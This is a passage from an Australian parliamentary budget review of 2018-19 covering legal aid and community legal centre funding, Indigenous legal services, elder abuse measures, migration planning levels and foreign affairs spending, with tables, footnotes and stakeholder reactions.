The allocation of this funding between legal aid commissions and CLCs is shown below.
Legal aid funding Funding is provided to legal aid commissions through two main sources—the NPALAS (through which funding is provided to states and territories) and the Expensive Commonwealth Criminal Cases Fund (ECCCF), which is administered by the Attorney-General’s Department (AGD).
Figure 1 shows payments to states and territories for legal aid commissions between 1995-96 and 2019-2020.272 From 2015-16 the funding reflects the current NPALAS.
268. Council of Australian Governments (COAG), National Partnership Agreement on Legal Assistance Services, [2016], as varied 28 June 2017. 269. J Murphy and M Brennan, ‘Legal aid and legal assistance services’, Budget review 2016-17, Research paper series, 2015-16, Parliamentary Library, Canberra, 2016, p. 75; COAG, National Partnership Agreement on Legal Assistance Services, [2010]. 270. Australian Government, Federal financial relations: budget paper no. 3: 2018-19, pp. 64, 66. 271. COAG, National Partnership Agreement on Legal Assistance Services, [2016], as varied 28 June 2017, clause 7. 272. For consistency, figures for 1994-1995 to 2007-2008 were drawn from the relevant portfolio budget Statements: see, for
example, Australian Government, Portfolio budget statements 1995-1996: budget related paper no. 4.1: Attorney-General's Portfolio, p. 75. The figures for 2008-09 to 2014-15 were drawn from the respective Final Budget Outcome papers: see, for example, Australian Government, Final budget outcome 2014-2015, 2015, p. 77. Figures from 2015-16 to 2020-21 were drawn from COAG, National Partnership Agreement on Legal Assistance Services, [2016], as varied 28 June 2017, pp. 10-12 and calculated on the basis of the funding allocated for legal aid commissions only. Other sources provide figures that can differ substantially, see: J Murphy, ‘Legal aid and legal assistance services’, Budget review 2013-14, Research paper, 3, 2012-13, Parliamentary Library, Canberra, May 2013, p. 61.
Budget Review 2018-19 58
Figure 1: payments for the provision of legal aid services to states and territories
ECCCF funding Funding for legal aid commissions is also provided through the ECCCF.273 ECCCF funding will be stable over the forward estimates period and from 2017-18 represents a return to levels similar to that provided prior to the 2011-12 Budget revisions (as discussed in Budget Review 2014-15).274 Table 1 shows ECCCF funding over the forward estimates.275
Table 1: Expensive Commonwealth Criminal Cases Fund amounts
(all figures in $’000) 2016-17
Budget
2017-18 Budget
2018-19 Budget 2019-20 Forward
estimate
2020-21 Forward estimate
2021-22 Forward estimate
Expensive Commonwealth Criminal Cases Fund
2016-17 Budget
4 610 3 682 3 733 3 784 — —
2017-18 Budget
4 610* 3 675 3 722 3 769 3 799 —
2018-19 Budget
— 3 675* 3 722 3 765 3 799 3 852
Change: 2017- 18 to 2018-19
N/A 0 0 -4 0 N/A
*Estimated actual from relevant Portfolio budget statements.
Source: as per footnote 8.
273. Attorney-General’s Department (AGD), ‘Expensive Commonwealth Criminal Cases Fund’, AGD website. Under the ECCCF, the AGD has discretion to provide additional funding to legal aid commissions for specific, complicated Commonwealth criminal cases, such as drug importation or criminal conspiracy cases.
274. J Murphy, ‘Legal aid and legal assistance services’, Budget review 2014-15, Research paper series, 2013-14, Parliamentary Library, Canberra, 2014, pp. 115-116. For a discussion of the 2014-15 budget measure ‘Legal aid—withdrawal of additional funding’ see: J Murphy, ‘Legal aid and legal assistance services’, op. cit., p. 115; Australian Government, Portfolio budget statements 2016-17: budget related paper no. 1.2: Attorney-General's Portfolio, p. 19; Australian Government, Portfolio budget statements 2017-18: budget related paper no. 1.2: Attorney-General's Portfolio, p. 19; Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.2: Attorney-General's Portfolio, p. 17.
275..
Budget Review 2018-19 59
Community legal centre funding The Australian Government provides funding for CLCs through the NPALAS and the ‘Justice Services’ program in the AGD.
As discussed above, the current NPALAS includes funding for CLCs. This means that from 2015-16 the majority of funding for CLCs will be provided through the NPALAS. Prior to this, the majority of CLC funding was provided through the AGD.276
Under the NPALAS as originally agreed, over the three years 2017-18 to 2019-20, CLC funding would have been $30.6 million less than if funding was maintained at 2016-17 Budget levels.277 On 24 April 2017, the Government announced an additional $39 million for CLCs to be delivered through the NPALAS.278 This additional funding was reflected in the 2017-18 Budget and may be regarded as largely representing a reversal of the forecast $30.6 million reduction, with a modest additional increase of $8.4 million over three years (around 5.8 per cent of total NPALAS CLC funding over that period).279
AGD ‘Justice Services’ funding Due to the redirection of CLC funding through the NPALAS, the amount of CLC funding delivered by the AGD has decreased. The forecast CLC funding provided through the AGD over the forward estimates shown in the 2018-19 Budget is consistent with the figures forecast in the 2017-18 Budget, as Table 2 below demonstrates.280 This year’s forecast shows CLC funding provided through the AGD decreasing by 71 per cent ($7.2 million) between 2018-19 and 2019-20, and then stabilising over the remainder of the forward estimates.281 This funding decrease appears to be related to the changed focus of the AGD’s Community Legal Services Programme from providing funding for delivery of legal services to a discretionary grant program, which will fund ‘national service delivery projects, innovative pilot programmes and programme support activities’ to enhance the provision of legal assistance to the community.282
276. Australian Government, Portfolio budget statements 2015-16: budget related paper no. 1.2: Attorney-General's Portfolio, pp. 19, 30. 277. COAG, National Partnership Agreement on Legal Assistance Services, [2016], as originally agreed, pp. 10-11. 278. G Brandis (Attorney-General), M Cash (Minister for Women) and N Scullion (Minister for Indigenous Affairs), Record federal
funding for legal assistance, media release, 24 April 2017. See also: Murphy and Brennan, ‘Legal aid and legal assistance services’, op. cit., for more details about CLC funding under the NPALAS. 279. For details about the forecast CLC funding cuts see: Murphy and Brennan, ‘Legal aid and legal assistance services’, op. cit., pp. 76-77. 280.. 281. Portfolio budget statements 2018-19: budget related paper no. 1.2: Attorney-General's Portfolio, op. cit., p. 17. 282. AGD, ‘Community Legal Services Programme’, AGD website. For further information see: AGD, Programme guidelines for Community Legal Services Programme, 2015.
Budget Review 2018-19 60
Table 2: funding for CLCs provided through the AGD
(all figures in $’000)
2016-17 Budget 2017-18 Budget
2018-19 Budget
2019-20 Forward Estimate
2020-21 Forward Estimate
2020-21 Forward Estimate
Community legal services 2016-17 Budget
7 906 7 704 2 627 2 661 — —
2017-18 Budget
8 016* 8 989 10 185 2 991 3 179 —
2018-19 Budget
— 8 989* 10 185 2 988 3 179 3 223
Change: 2017-18 to 2018-19
— 0 0 -3 0 N/A
*Estimated actual from relevant Portfolio budget statements. Source: as per footnote 13.
Total CLC funding The figure below shows Commonwealth recurrent spending on CLCs from 2005-06 to 2019-20.283 The figures from 2015-16 onwards include funding provided through the AGD and funding provided under the NPALAS.284
Indigenous legal assistance services As noted in Budget Review 2014-15, changes to some Indigenous program names, their transfer to the Department of the Prime Minister and Cabinet, subsequent consolidation, and the lack of detail in relevant portfolio budget papers makes assessing long-term funding trends difficult.285
283. The forward estimates do not include figures for 2020-21, reflecting the expiry of the NPALAS on 30 June 2020, and hence figures for 2020-21 are not included. 284. For consistency, figures for 2005-2006 to 2015-16 were drawn from the respective final budget outcome papers. See, for example: Australian Government, Final budget outcome 2014-2015, September 2015, p. 77. Figures from 2016-17 to 2019-
20 were drawn from COAG, National Partnership Agreement on Legal Assistance Services, [2016], as varied 28 June 2017, pp. 10-12 and the relevant portfolio budget papers and calculated by combining the spending on CLCs contained in the NPALAS and portfolio budget paper. See, for example, Portfolio budget statements 2018-19: budget related paper no. 1.2: Attorney-General's Portfolio, op. cit., p. 17. 285. Murphy, ‘Legal aid and legal assistance services’, Budget review 2014-15, op. cit., p. 116 and sources cited therein.
Budget Review 2018-19 61
The funding commitments for the Indigenous Legal Assistance Program ((ILAP), previously named the Indigenous Legal Aid Policy Reform Program),286 are detailed in the following table:
Table 3: funding commitments for the Indigenous Legal Assistance Program
(all figures in $’000) 2016-17
Budget 2017-18 Budget 2018-19
Budget 2019-20 Forward estimate
2020-21 Forward estimate
2021-22 Forward estimate
Indigenous Legal Assistance Program
2016-17 Budget 73 585 69 099 68 992 69 890 — —
2017-18 Budget 73 585* 74 463 74 365 75 276 70 173 —
2018-19 Budget — 74 463* 74 365 75 202 70 173 71 155
Change: 2017-18 to 2018- 19 N/A 0 0 -74 0 N/A
* Estimated actual from relevant portfolio budget statements. 287
Source: as per footnote 19.
The funding for the Indigenous Legal Assistance Program in the 2018-19 Budget is largely consistent with the funding indicated in the 2017-18 Budget.288
The estimated amount spent on the ILAP in 2013-14 was $74.9 million.289 Using that figure as a benchmark, the 2016-17 Budget indicated that funding for the ILAP would be 1.8 per cent ($1.3 million) less in 2016-17; 7.8 per cent ($5.8 million) less in 2017-18; eight per cent ($5.9 million) less in 2018-19 and 6.7 per cent ($5 million) less in 2019-20.290 Over the period 2017-18 to 2019-20, this would have been a cut of $16.7 million—the same amount of additional funding for Aboriginal and Torres Strait Islander Legal Services announced by the Government in April 2017 and reflected in the 2017-18 and 2018-19 budget papers.291
Domestic violence services This year’s budget has no additional funding for domestic violence services, however as part of the Women’s Safety Package, last year’s (2017-18) Budget included $3.4 million in funding over two years to expand the trial of Domestic Violence Units (DVUs) in legal centres around Australia.292 The DVUs will provide legal and other assistance (such as financial counselling, tenancy assistance, trauma counselling, emergency accommodation, family law services and employment services) to women who are experiencing, or at risk of, domestic or family violence. The location of the DVUs was announced in October 2017, in high need areas in each state and the Northern Territory.293
286. Murphy, ‘Legal aid and legal assistance services’, Budget review 2015-16, Research paper series, 2014-15, Parliamentary Library, Canberra, 2015, p. 106 and sources cited therein. 287. Portfolio budget statements 2016-17: budget related paper no. 1.2: Attorney-General's Portfolio, op. cit., p. 20; Portfolio budget statements 2017-18: budget related paper no. 1.2: Attorney-General's Portfolio , op. cit., p. 20; Portfolio budget
statements 2018-19: budget related paper no. 1.2: Attorney-General's Portfolio, op. cit., p. 19. 288. Portfolio budget statements 2017-18: budget related paper no. 1.2: Attorney-General's Portfolio , op. cit., p. 20; Portfolio budget statements 2018-19: budget related paper no. 1.2: Attorney-General's Portfolio, op. cit., p. 19. 289. Australian Government, Portfolio budget statements 2014-15: budget related paper no. 1.2: Attorney-General's Portfolio,
2014, p. 32; Murphy, ‘Legal aid and legal assistance services’, op. cit., p. 106 and sources cited therein. 290. Australian Government, Portfolio budget statements 2016-17: budget related paper no. 1.2: Attorney-General's Portfolio, op. cit., p. 20 291. Brandis et al, Record federal funding for legal assistance, op. cit.; Portfolio budget statements 2017-18: budget related paper
no. 1.2: Attorney-General's Portfolio , op. cit., p. 20; Portfolio budget statements 2018-19: budget related paper no. 1.2: Attorney-General's Portfolio, op. cit., p. 19. 292. Australian Government, Budget measures: budget paper no. 2: 2017-18, p. 71. 293. G Brandis (Attorney-General), Turnbull Government funds new domestic violence units, media release, 16 October 2017.
Budget Review 2018-19 62
Reaction from stakeholders The Law Council of Australia (LCA) has called for a ‘significant boost in federal funding for legal aid’ as it regards the legal assistance sector as ‘critically underfunded’.294 LCA President Morry Bailes said:
Through the Law Council’s Justice Project, we estimate that an additional $390m per annum is required to get the legal assistance system back on its feet. This includes $200m as recommended by the Productivity Commission for civil legal assistance alone. 295
The preventative, everyday role of timely legal assistance stops simple problems from escalating into more serious matters at great cost to the taxpayer and community. It’s time this was recognised and funded adequately. 296
The National Association of Community Legal Centres expressed disappointment that the Budget did not provide additional core funding for legal services and felt that the Budget was ‘a missed opportunity to provide funding certainty ahead of expiration of National Partnership Agreement on Legal Assistance Services in 2020’.297
The National Aboriginal and Torres Strait Islander Legal Services (NATSILS) considers that the budget will ‘create more legal need for Aboriginal and Torres Strait Islander people’ by failing to address recommendations of the Australian Law Reform Commission and the Royal Commission into the Protection and Detention of Children in the Northern Territory aimed at addressing the over-representation of Indigenous people in custody.298 NATSILS is disappointed that the budget did not provide additional support for Indigenous legal services.299
294. Law Council of Australia, Budget boost to counter elder abuse welcome, but greater funding required to end justice crisis, media release, 8 May 2018. 295. For further information see: Productivity Commission (PC), Access to justice arrangements, Inquiry report, 72, PC, Canberra, 5 September 2014. 296. Law Council of Australia, Budget boost to counter elder abuse welcome, but greater funding required to end justice crisis,
op. cit.
297. National Association of Community Legal Centres, A missed opportunity to guarantee essential services, media release, n.d. 298. For further information see: Australian Law Reform Commission (ALRC), Pathways to justice: an inquiry into the incarceration rate of Aboriginal and Torres Strait Islander peoples, Final report, 133, ALRC, Sydney, December 2017 and Royal Commission into the Protection and Detention of Children in the Northern Territory, Report of the Royal Commission and Board of Inquiry
into the Protection and Detention of Children in the Northern Territory, The Commission, Canberra, November 2017. 299. National Aboriginal and Torres Strait Islander Legal Services, Federal Budget measures will create more legal need for Aboriginal and Torres Strait Islander people but no solutions, media release, 9 May 2018.
Budget Review 2018-19 63
Responding to elder abuse Kaushik Ramesh
More Choices for a Longer Life—protecting older Australians The Budget contains a range of measures under the umbrella of the ‘More Choices for a Longer Life’ package aimed at ‘maximis[ing] the opportunities that a longer life brings’.300 The package recognises:
Australians are now expected to live almost 10 years longer than they were 50 years ago, with our life expectancy now fifth highest in the OECD. This is a remarkable achievement. To make the most of the opportunities a longer life provides, Australians need to prepare early to be healthy, independent, connected and safe.
301
As part of this suite of measures, the Government has committed $22.0 million over five years from 2017-18 to respond to elder abuse and protect the rights of older Australians. This element of the package comes within the responsibility of the Attorney-General’s portfolio.302
The total proposed expenditure on the measure is set out in Table 1.
Table 1: Expense measure: More choices for a Longer Life - protecting older Australians
Expense ($m) 2017-18 2018-19 2019-20 2020-21 2021-22
Administered - 2.5 5.2 5.3 5.3
Departmental -6.0 0.5 3.1 3.1 3.1
Total -6.0 3.0 8.2 8.3 8.4
Source: Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.2: Attorney-General’s Portfolio, p. 13.
Elder Abuse Report The ‘More Choices for a Longer Life - protecting older Australians’ measure responds to the Australian Law Reform Commission’s (ALRC) report Elder Abuse - A National Legal Response (Elder Abuse Report).303 The terms of reference for the inquiry provided by then Attorney-General Senator Brandis asked the ALRC to consider:
⢠existing Commonwealth laws and legal frameworks which protect elder persons from abuse by carers, supporters and representatives, including regulation of financial institutions, superannuation, social security, health and living and care arrangements and
⢠the interaction and relationship of relevant Commonwealth laws with state and territory laws.304
The Elder Abuse Report made 43 recommendations aimed at safeguarding ‘older people from abuse and support[ing] their choices and wishes’.305 These recommendations included:
⢠developing, in conjunction with the states and territories, a National Plan to combat elder abuse that will promote the autonomy of older people, address ageism, achieve national consistency and safeguard at-risk adults306
300. Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, p. 1-24. 301. Australian Government, More Choices for a Longer Life, Budget 2018 fact sheet, 2018. 302. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 76. 303. Budget paper no. 1, op. cit., p. 1-26; Australian Law Reform Commission (ALRC), Elder abuse - a national legal response: final
report, 131, ALRC, Sydney, May 2017. 304. Ibid., p. 5. 305. Ibid., p. 28.
Budget Review 2018-19 64
⢠conducting a national prevalence study of elder abuse to build an evidence base ahead of formulating policy307
⢠establishing a national online register of enduring documents, and court and tribunal appointments of guardians and financial administrators308 and
⢠developing national, best practice guidelines for legal practitioners in relation to the preparation and execution of wills to cover matters such as elder abuse.309
Policies under the ‘More Choices for a Longer Life - protecting older Australians’ measure The $22.0 million funding provided to the Attorney-General’s Department will support:
⢠expansion and evaluation of support service trials such as:
- specialist elder abuse units in legal services
- health-justice partnerships and
- family counselling and mediation services
⢠an Elder Abuse Knowledge Hub
⢠a National Prevalence Research scoping study and
⢠development of a National Plan to address elder abuse. 310
The funding provided in the 2018-19 Budget builds on $15 million committed by the Government in the 2016-17 MYEFO in fulfilment of a 2016 election commitment.311
Elder Abuse Knowledge Hub and National Prevalence Research scoping study
The proposed Elder Abuse Knowledge Hub will be ‘an online gateway raising awareness and providing information and training materials for the public and professionals about preventing and responding to elder abuse’.312 The National Prevalence Research scoping study, being conducted
by the Australian Institute of Family Studies (AIFS), seeks to ‘better understand the nature, scale and scope’ of elder abuse in Australia.313
National Plan to address elder abuse On 20 February 2018, the Attorney-General, Christian Porter, announced that a National Plan would be developed in conjunction with state and territories Attorneys-General.314 Mr Porter stated that, in line with the recommendations of the Elder Abuse Report, the National Plan will have five goals:
⢠promoting the autonomy and agency of older people
⢠addressing ageism and promoting community understanding of elder abuse
⢠achieving national consistency
⢠safeguarding at-risk older people and improving responses
306. Ibid., p. 9. 307. Ibid. 308. Ibid., p. 12. 309. Ibid., p. 14. 310. Budget paper no. 2, op. cit., pp. 76-77. 311. Australian Government, Mid-year economic and fiscal outlook 2016-17, p. 136; Budget paper no. 2, op. cit., p. 77; Liberal
Party of Australia, Election 2016: Protecting the rights of older Australians, Coalition policy document, Election 2016. 312. G Brandis (Attorney-General), International Day of Older Persons - supporting older Australians, media release, 1 October 2017; see also Liberal Party of Australia, Election 2016: Protecting the rights of older Australians, op. cit. 313. Ibid. 314. C Porter (Attorney-General), National plan to address elder abuse, media release, 20 February 2018.
Budget Review 2018-19 65
⢠building the evidence basis. 315
Mr Porter also noted that the study conducted by the AIFS would provide the evidence base to ensure that the National Plan provides appropriate frameworks and strategies to respond to elder abuse.316
Support services.317 Such partnerships are being trialled or developed in a number of places around Australia, including through Townsville Community Legal Services and Townsville Hospital, and in Caulfield and Footscray in Victoria.318
National Register for Enduring Powers of Attorney The Budget papers advise that the Government ‘will work with the states and territories to develop a nationally consistent legal framework and establish a National Register of Enduring Powers of Attorney’.319 The expenditure required for this process has been accounted for in the Budget, but has not been published as the outcome of negotiations with the states and territories is still pending.320
The commitment to create this register responds to the Elder Abuse Report’s recommendation.321 The ALRC accepted that abuse of enduring documents was occurring and ‘the extent of the powers granted by enduring documents means that any abuse is often relatively serious in its financial impact’.322 Accordingly, the ALRC recommended a register where only one enduring document of a particular type (financial or personal) could be registered at a time so that
documents are properly revoked and revoked instruments cannot be used.323
Stakeholder reaction The Law Council of Australia (LCA) welcomed the budget measure, commenting that it had ‘long urged’ the Government to develop a National Plan and a National Prevalence study on elder abuse.324
National Seniors Australia welcomed the ‘commitment to tackling the issue of elder abuse’, but stated that it ‘will be looking for ongoing funding from the Federal Government for specialist elder abuse support services beyond the trial period’.325
COTA Australia stated:
We welcome additional funds for elder abuse initiatives and the Federal Government taking leadership in the development of a national framework and approach, including a national register of enduring powers of attorney. 326
315. Ibid. 316. Ibid. 317. ALRC, Elder abuse, op. cit., p. 337. 318. Ibid., p. 339. 319. Budget paper no. 2, op. cit., p. 77. 320. Ibid. 321. ALRC, Elder abuse, op. cit., p. 12. 322. Ibid., pp 181-182. 323. Ibid., p. 182. 324. Law Council of Australia, Budget boost to counter elder abuse welcome, but greater funding required to end justice crisis,
media release, 8 May 2018. 325. National Seniors Australia (NSA), ‘The highs and lows of the "Baby Boomer budget"’, NSA website.
Budget Review 2018-19 66
Immigration Henry Sherrell
Permanent migration
Planning levels Recent public and political debate about the appropriate size of Australia’s migration intake has renewed interest in migration policy. Each year in the budget, the Australian Government establishes a planning level outlining how many permanent residency visas to grant. These visas are allocated to the Migration Program (for skilled and family visas) and the Humanitarian Program.327 This is the Australian Government’s key policy lever to influence the rate of immigration to Australia.
In 2018-19, the planning figure for the Migration Program remains unchanged at 190,000 visas, marking the seventh consecutive year this figure has been used.328 This was announced in the Regional Australia ministerial budget statement, unlike in past years where the figure was in the Department of Home Affairs Portfolio Budget Statement. This continues the highest planning level on record.329
While the headline planning figure has not changed since 2012-13, a number of recent policy decisions are changing the composition and actual size of the Migration Program. The planning level itself has changed from a target to a ceiling, as noted in Minister Dutton’s media release for the 2017-18 Budget.330 In 2016-17, for the first time, there was a large discrepancy between the
planning level and the number of permanent residency visas granted.331 It may be the case future discrepancies exist for 2017-18 and into the forward estimates period.
A new visa category for New Zealand citizens, announced in February 2016, will see additional long-term Australian residents on temporary visas transition to permanent residency.332 These people will be counted within the 190,000 visa planning level. The Department of Home Affairs has confirmed over 10,000 visa applications have been submitted under the New Zealand pathway in 2017-18, meaning a greater share of visas in the Migration Program will now be allocated to people already in Australia.333 This will change the composition of who receives a permanent visa, with fewer people who live overseas directly gaining a permanent visa. Further, broad policy change to temporary skilled worker visas has resulted in a sharp drop in new visa applications.334 Over the forward estimates period, both of these policy decisions will place downward pressure on the rate of net overseas migration.
326. COTA Australia, Federal Budget 2018 - welcome commitment to better planning for an ageing population and aged care, media release, 8 May 2018. 327. The budget figures in this brief have been taken from the following document unless otherwise sourced: Australian Government, Budget measures: budget paper no. 2: 2018-19. 328. M McCormick (Deputy Prime Minister) and J McVeigh (Minister for Regional Development, Territories and Local
Government), Regional Australia-a stronger economy delivering stronger regions 2018-19, ministerial budget statement, 2018, p. 115. 329. J Phillips and J Simon-Davies, Migration to Australia: a quick guide to the statistics, Research paper series, 2016-17, Parliamentary Library, Canberra, 2017. 330. P Dutton (Minister for Immigration and Border Protection), 2017 Budget-immigration and border protection, media release,
9 May 2017. 331. 183,608 permanent visas were granted in 2016-17 for a planning level of 190,000. See H Sherrell, ‘Behind the numbers-the 2016-17 Migration Programme’, FlagPost, Parliamentary Library blog, 24 November 2017. 332. Department of Home Affairs, ‘An additional pathway to permanent residency for New Zealand citizens’, Fact sheet and
Frequently asked questions, Department of Home Affairs website. 333. Department of Home Affairs, correspondence with the Parliamentary Library, April 2018. 334. H Sherrell, ‘Assessing the effect of recent 457 visa policy changes’, FlagPost, Parliamentary Library blog, 12 January 2018.
Budget Review 2018-19 67
The planning level for the 2018-19 Humanitarian Program will increase to 18,750 places, up from 16,250 in 2017-18. This was announced and funded in the 2015-16 Budget.335 This will be the second largest Humanitarian Program since the Hawke Government.336 The Department of Home Affairs Portfolio Budget Statement also introduces the word ‘ceiling’ for the Humanitarian Program.337 This was previously not the case. In addition, the number of places in the Humanitarian Program is not stated, whereas it was in previous Portfolio Budget Statements.338
Retirement category visas The 2018-19 Budget includes the establishment of a new pathway to permanent residency for holders of retirement category visas, a visa for self-funded retirees who have no dependents.339 This will be achieved by regulatory amendments. To maintain the overall planning level, people who hold a retirement visa will be allocated a proportion of visas that would have otherwise been granted to people who have applied for parent visas. This will likely increase waiting periods for parent visas, which are currently between six and 30 years.340 In addition, as people who hold retirement visas already live in Australia, and as most people who gain a parent visa currently live outside of Australia, this change will reduce the number of new migrants to Australia. 341
Migration, population growth and the Budget A number of commentators have noted the importance of population growth, and immigration flows, to economic growth and fiscal projections in the Budget.342 A recent joint Treasury and Department of Home Affairs report concluded the net fiscal impact of the 2014-15 migrant cohort (the Migration Program, the Humanitarian Program and temporary skilled visa program) is $9.7 billion over 50 years.343 The fiscal effect of new migrants was noted by the Treasurer recently in the context of the debate about the appropriate size of the Migration Program.344
It can be difficult to project net overseas migration (NOM) trends. NOM is the net gain or loss of population through people arriving to or departing Australia. For example, in the 2017-18 Budget, the NOM projection for 2017 was 209,018 whereas the actual figure was 242,600, an increase of 16 per cent on the projection.345
Table A.2 in Budget Paper No. 3 shows the assumptions for NOM in the 2018-19 Budget. The assumptions show NOM gradually falling from 234,600 in 2018 to 221,400 in 2021.346 Variations from these assumptions would necessarily flow through to a range of projections in the Budget, including GDP growth and the underlying fiscal conditions.
335. P Dutton (Minister for Immigration and Border Protection), Restoring integrity to refugee intake, media release, 12 May 2015. 336. Phillips and Simon-Davies, op. cit. 337. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.10: Home Affairs Portfolio, p. 51. 338. Ibid. 339. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 14. 340. Parliamentary Library calculations based on Department of Immigration and Border Protection (DIBP), 2016-17 Migration
Programme report, pp. 14-15. 341. Ibid., p. 3. 342. See M Janda, ‘How the Government’s surplus plan locks in high immigration’, ABC News, 9 May 2018; and J Sloan, ‘Optimistic
forecasts crowd out an immigration fix’, The Australian, 9 May 2018, p. 13. 343. The Treasury and Department of Home Affairs, Shaping a nation: population growth and immigration over time, Canberra, 2018, p. 35. 344. S Morrison (Treasurer), Interview Neil Mitchell, 3AW, Immigration, corporate tax cuts, petrol prices, transcript, 21 February
2018.
345. Australian Government, Budget measures: budget paper no. 3: 2017-18, p. 88 and Australian Government, Budget measures: budget paper no. 3: 2018-19, p. 84. 346. Ibid., p. 84.
Budget Review 2018-19 68
The NOM budget assumptions over the forward estimates represent a decline from current NOM trends. The most recently available Australian Bureau of Statistics data show in the 12 months to 30 September 2017, the preliminary estimate for NOM was 250,100, a 15.4 per cent increase compared to the previous 12 month period.347 This level of NOM represents 63 per cent of Australia’s population growth.
Other migration and associated measures As part of the Stronger Rural Health package, the Australian Government is reducing the number of visas granted to overseas trained doctors to around 2,100 per year. This reduction in visas will redirect $415.5 million over the forward estimates into other health policy priorities. This is the largest saving in the Budget.348 Australian trained doctors are being encouraged into areas of shortage via a variety of new policies to make up for the reduction in overseas trained doctors.349
A new fund for training Australians, the Skilling Australians Fund (SAF), was introduced in the 2017-18 Budget.350 The SAF imposes a levy on employers who sponsor temporary and permanent skilled migrants. A new measure in the 2018-19 Budget provides for a series of employer refund and exemption provisions. The Australian Government expects to forego $105.1 million over the forward estimates, resulting in an equivalent reduction in payments to state and territory governments via the SAF. The Law Council recommended the Australian Government provide further clarity and consideration for levy refunds in their December 2017 submission on the legislation.351 This change will require legislation.
Restrictions on recent humanitarian migrants accessing full jobactive support are being extended from 13 weeks to 26 weeks, generating savings of $68.1 million over the forward estimates. The Australian Government says this is to ‘improve the sequencing of services’ and to promote language services for new humanitarian migrants to Australia. The Minister for Citizenship and Multicultural Affairs, Alan Tudge, recently highlighted the importance of getting new arrivals into work: ‘Our goal should be that people arrive here and immediately have a place to work …the best place to integrate is in the workplace’. 352 One concern with this measure is that it could impede some new arrivals who are job ready from entering the workforce.
Operation Sovereign Borders and asylum policy Additional funding for detention, offshore processing and border protection has been a strong focus of recent Budgets. The 2018-19 Budget provides an additional $62.2 million for two years for Operation Sovereign Borders. There are four sub-components of this measure, including offshore resettlement arrangements and regional cooperation initiatives. However the funding breakdown is aggregated into one figure.
The Department of Home Affairs Portfolio Budget Statement notes expenses for Irregular Maritime Arrival Offshore Management is expected to halve from $759.9 million in 2018-19 to $378.4 million in 2019-20.353 Similarly, expenses associated with regional cooperation are
347. Australian Bureau of Statistics (ABS), Australian Demographic Statistics, Sep 2017, cat. no. 3101.0, ABS, Canberra, 2018. 348. Australian Government, Budget 2018-19: budget overview , Appendix D, p. 36. 349. For more detail on these policies, see M Biggs, ‘Rural Health Workforce’, Budget review 2018-19, Research paper series, 2017-18, Parliamentary Library, Canberra, 2018.
350. For more detail on the Skilling Australians Fund, see H Ferguson, ‘Tertiary education’, Budget review 2018-19, Research paper series, 2017-18, Parliamentary Library, Canberra, 2018. 351. Law Council of Australia, Submission to Senate Standing Committee on Education and Employment, Inquiry into the Migration Amendment (Skilling Australians Fund) Bill 2017, and the Migration (Skilling Australians Fund) Charges Bill 2017 [provisions],
22 December 2017, p. 6. 352. A Tudge (Minister for Citizenship and Multicultural Affairs), The integration challenge: maintaining successful Australian multiculturalism, speech to the Menzies Research Centre, Canberra, 7 March 2018. 353. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.10: Home Affairs Portfolio, p. 29.
Budget Review 2018-19 69
projected to fall from $91.1 million in 2018-19 to $47.3 million in 2019-20.354 This is likely due to an expected smaller number of people being in offshore management and a draw down on projects facilitating regional cooperation, however an explanation is not provided in departmental budget documents. As the estimated actual expenditure on Irregular Maritime Arrival Offshore Management was double the forecast for 2017-18, these figures may be subject to change.355
354. Ibid. 355. Ibid., and see Australian Government, Portfolio budget statements 2017-18: budget related paper no. 1.11: Home Affairs Portfolio, p. 25.
Budget Review 2018-19 70
Foreign affairs and Official Development Assistance Dr Geoff Wade and Dr Cameron Hill
A domestically-focused 2018-19 Budget sees little change in the profile and tasks of the Department of Foreign Affairs and Trade (DFAT). The departmental appropriation of $1.96 billion represents a slight decrease (2 per cent) relative to the 2017-18 estimated actual, while overall resourcing is slated to climb by almost 2 per cent to $6.1 billion. Average staffing levels will also rise from 5,700 to 5,741.356
Guided by the 2017 Foreign Policy White Paper, DFAT’s strategic attention remains in the Indo-Pacific.357 Australian diplomatic representation is proposed to expand through a new Consulate-General in Kolkata, India, and a new High Commission in Tuvalu. The Government describes these
new posts as being part of the ‘largest expansion of our diplomatic network in 40 years’.358 Remarkable, though, is the absence in DFAT’s Strategic Direction Statement of any reference to Australia’s links with the United States, despite the frequency of such references in the White Paper and earlier budget papers.
The Pacific has assumed a larger profile than in previous budgets, with increased ‘support for a more resilient Pacific and Timor-Leste’ being listed as ‘one of the five objectives of fundamental importance to Australia’s security and prosperity’—an agenda adopted in the White Paper.359
An Australia Pacific Security College is being funded ‘to deliver security and law enforcement training at the leadership level’.360 This initiative could be seen as a mechanism to counter China’s growing security and law enforcement engagement with Pacific nations.361 Funding for the College is included in the $37.9 million to be provided over four years from 2017-18 for initiatives supporting the White Paper.362 Increased defence engagement with the Pacific is being funded through an expanded Defence Cooperation Program.363
Australia’s engagement with Southeast Asia will be further expanded through a ‘package of new maritime cooperation initiatives’, agreed at the 2018 ASEAN-Australia Leaders’ Summit in March.364 Again, this might be seen as a response to China, which has issued its own ‘Vision for Maritime Cooperation under the Belt and Road Initiative’.365 Specifics about the Australian maritime initiatives with Southeast Asia have not been publicly detailed.
On the trade front, the stress on the original Trans-Pacific Partnership agreement has shifted to enthusiasm for the now-signed Comprehensive and Progressive Agreement for the Trans-Pacific Partnership (TPP-11). Ongoing free trade agreement talks with Indonesia, Hong Kong and the Pacific, as well as impending negotiations with the European Union, are also underlined.
356. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.8: Foreign Affairs and Trade Portfolio, 2018, pp. 16-17. 357. Department of Foreign Affairs and Trade (DFAT), 2017 Foreign policy white paper, Australian Government, November 2017. The White Paper defines the Indo-Pacific as ‘the region ranging from the eastern Indian Ocean to the Pacific Ocean connected
